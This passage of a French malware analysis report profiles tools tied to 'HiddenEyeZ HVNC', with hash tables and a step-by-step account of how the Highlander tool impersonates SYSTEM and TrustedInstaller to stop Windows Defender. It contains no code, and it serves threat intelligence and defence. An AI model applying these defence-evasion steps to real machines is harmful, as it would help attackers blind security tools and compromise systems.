border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_23319849\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Sun Feb 27 23:06:01 2101 | Incoherent<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_3651020\" class=\"desktop-view tr_class_3651020 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_90964305\" rowspan=\"1\" colspan=\"1\" class=\"td_class_90964305\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_90964305\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Obfuscation<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_85405762\" rowspan=\"1\" colspan=\"1\" class=\"td_class_85405762\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_85405762\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">No<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_6471413\" class=\"desktop-view tr_class_6471413 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_22731821\" rowspan=\"1\" colspan=\"1\" class=\"td_class_22731821\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_22731821\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">md5<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_27089268\" rowspan=\"1\" colspan=\"1\" class=\"td_class_27089268\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_27089268\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">b785943821261b267d3f3d686fc013e6<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_2624678\" class=\"desktop-view tr_class_2624678 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_74398198\" rowspan=\"1\" colspan=\"1\" class=\"td_class_74398198\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_74398198\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">sha1<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_81484118\" rowspan=\"1\" colspan=\"1\" class=\"td_class_81484118\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_81484118\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">a2e4412c9e1cf33c668e786c2bdec35c2f86a688<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_8844292\" class=\"desktop-view tr_class_8844292 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_36997657\" rowspan=\"1\" colspan=\"1\" class=\"td_class_36997657\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_36997657\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">sha256<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_66951413\" rowspan=\"1\" colspan=\"1\" class=\"td_class_66951413\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_66951413\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">a8361bd86b7859c0d93c8470975e9ffd20765c42ecb49491c029542213410a85<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_9388197\" class=\"desktop-view tr_class_9388197 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_97969899\" rowspan=\"1\" colspan=\"1\" class=\"td_class_97969899\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_97969899\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">ssdeep<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_61574672\" rowspan=\"1\" colspan=\"1\" class=\"td_class_61574672\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_61574672\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">192:6QUlf6ETyQ7H3QxX5ARunnf0HD7mZoPfYIqL0HjvFYx:TU4ET9b3QV5Tnn3KH1yINY<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<\/p>\n<h4>Pr\u00e9sentation<\/h4>\n<p>Cet outil, d\u00e9ploy\u00e9 par HiddenEyeZ HVNC, ne remplit qu'une seule fonctionnalit\u00e9 : d\u00e9sactiver Windows Defender.<\/p>\n<p>Son fonctionnement est assez basique pour \u00eatre d\u00e9crit en int\u00e9gralit\u00e9 :<\/p>\n<ul>\n<li>d\u00e9marrage du service <code>TrustedInstaller<\/code> : cette \u00e9tape permet de s'assurer qu'un processus est en cours d'ex\u00e9cution sous le compte TrustedInstaller\u00a0;<\/li>\n<li>tentative d'usurpation du compte <code>SYSTEM<\/code> via une impersonation : le malware tente d'ouvrir le token du processus <code>Winlogon<\/code> s'ex\u00e9cutant sous le compte SYSTEM et de s'impersonner avec pour objectif d'effectuer une premi\u00e8re \u00e9l\u00e9vation de privil\u00e8ges. \u00c0 noter que cette op\u00e9ration n\u00e9cessite des privil\u00e8ges qui ne sont disponibles que pour les comptes administrateur\u00a0;<\/li>\n<li>tentative d'usurpation du compte <code>TrustedInstaller<\/code> via une impersonation : le malware tente de r\u00e9aliser la m\u00eame action avec le compte <code>TrustedInstaller<\/code> pour se placer dans le contexte d'ex\u00e9cution de ce compte technique qui est utilis\u00e9 pour g\u00e9rer Windows Defender (d\u00e9marrage ou arr\u00eat de service, remplacement de fichiers, etc.)\u00a0;<\/li>\n<li>arr\u00eat du service Windows Defender : la derni\u00e8re \u00e9tape r\u00e9alise l'objectif initial de l'outil en d\u00e9sactivant Windows Defender. Ainsi, la furtivit\u00e9 du reste de l'attaque est am\u00e9lior\u00e9e.<\/li>\n<\/ul>\n<p>Voici l'impl\u00e9mentation de l'impersonation avec le compte <code>TrustedInstaller<\/code>.[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_single_image image=\"414162\" img_size=\"large\" alignment=\"center\" qode_css_animation=\"\"][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><em><small>Figure 23 : code de l'impl\u00e9mentation de l'impersonation avec le compte TrustedInstaller par l\u2019outil Highlander<\/small><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]L'outil semble plus tenir d'une preuve de concept sans avoir le niveau de qualit\u00e9 n\u00e9cessaire pour \u00eatre d\u00e9ploy\u00e9 lors d'une attaque\u00a0:<\/p>\n<ul>\n<li>pr\u00e9sence de nombreuses chaines de d\u00e9bogage\u00a0;<\/li>\n<li>aucune v\u00e9rification des \u00e9checs dans les diff\u00e9rentes \u00e9tapes.<\/li>\n<\/ul>\n<p>[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_single_image image=\"414167\" img_size=\"large\" alignment=\"center\" qode_css_animation=\"\"][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><em><small>Figure 24 : code de l\u2019outil Highlander illustrant le manque de v\u00e9rification du succ\u00e8s des diff\u00e9rentes \u00e9tapes<\/small><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]Toutes les actions seront effectu\u00e9es m\u00eames si les pr\u00e9c\u00e9dentes \u00e9chouent, ainsi elles \u00e9choueront elles aussi.<\/p>\n<h3>AddStartupTask<\/h3>\n<h4>Carte d'identit\u00e9<\/h4>\n<p>[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<div class=\"ntb_table_wrapper ninja_table_builder_instance_8\"\n     id='ninja_table_builder_414270'\n     data-ninja_table_builder_instance=\"ninja_table_builder_instance_8\"\n     style=\"\n     max-height:900px;\n     max-width: 800px;margin-right: auto;\">\n    <!----> <table id=\"ntb_table\" role=\"table\" class=\"table ninja_tables_builder_class_414270\" style=\"margin-top: 0px; margin-bottom: 0px; table-layout: fixed; border-collapse: collapse; border: 0px solid rgb(0, 0, 0); font-family: inherit; border-spacing: 0px; margin-right: auto;\"><!----> <tbody class=\"tbody\"><tr id=\"tr_id_6339902\" class=\"desktop-view tr_class_6339902 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_47180689\" rowspan=\"1\" colspan=\"1\" class=\"td_class_47180689\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_47180689\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Type of file<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_63752073\" rowspan=\"1\" colspan=\"1\" class=\"td_class_63752073\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_63752073\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">PE<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_2992313\" class=\"desktop-view tr_class_2992313 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_85508872\" rowspan=\"1\" colspan=\"1\" class=\"td_class_85508872\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_85508872\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Language used<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_67647307\" rowspan=\"1\" colspan=\"1\" class=\"td_class_67647307\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_67647307\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">.NET<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_7169041\" class=\"desktop-view tr_class_7169041 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_88081221\" rowspan=\"1\" colspan=\"1\" class=\"td_class_88081221\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_88081221\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Compilation date<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_23319849\" rowspan=\"1\" colspan=\"1\" class=\"td_class_23319849\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_23319849\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Fri Jul 8 11:52:00 2022<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_3651020\" class=\"desktop-view tr_class_3651020 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_90964305\" rowspan=\"1\" colspan=\"1\" class=\"td_class_90964305\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_90964305\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Obfuscation<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_85405762\" rowspan=\"1\" colspan=\"1\" class=\"td_class_85405762\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_85405762\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">No<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_6471413\" class=\"desktop-view tr_class_6471413 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_22731821\" rowspan=\"1\" colspan=\"1\" class=\"td_class_22731821\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_22731821\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">md5<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_27089268\" rowspan=\"1\" colspan=\"1\" class=\"td_class_27089268\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_27089268\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">5368a0fe20ac61149f28dc1a3a9ff829<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_2624678\" class=\"desktop-view tr_class_2624678 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_74398198\" rowspan=\"1\" colspan=\"1\" class=\"td_class_74398198\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_74398198\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">sha1<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_81484118\" rowspan=\"1\" colspan=\"1\" class=\"td_class_81484118\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_81484118\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">9127a299c46593f9e0de1f409b2a44e72aa5f6c4<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_8844292\" class=\"desktop-view tr_class_8844292 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_36997657\" rowspan=\"1\" colspan=\"1\" class=\"td_class_36997657\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_36997657\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">sha256<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_66951413\" rowspan=\"1\" colspan=\"1\" class=\"td_class_66951413\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_66951413\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">469e25f46030d6fb3b04e83b095b5c8e09017e39c40bc584920e324fd87d0700<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_9388197\" class=\"desktop-view tr_class_9388197 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_97969899\" rowspan=\"1\" colspan=\"1\" class=\"td_class_97969899\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_97969899\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">ssdeep<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_61574672\" rowspan=\"1\" colspan=\"1\" class=\"td_class_61574672\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_61574672\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 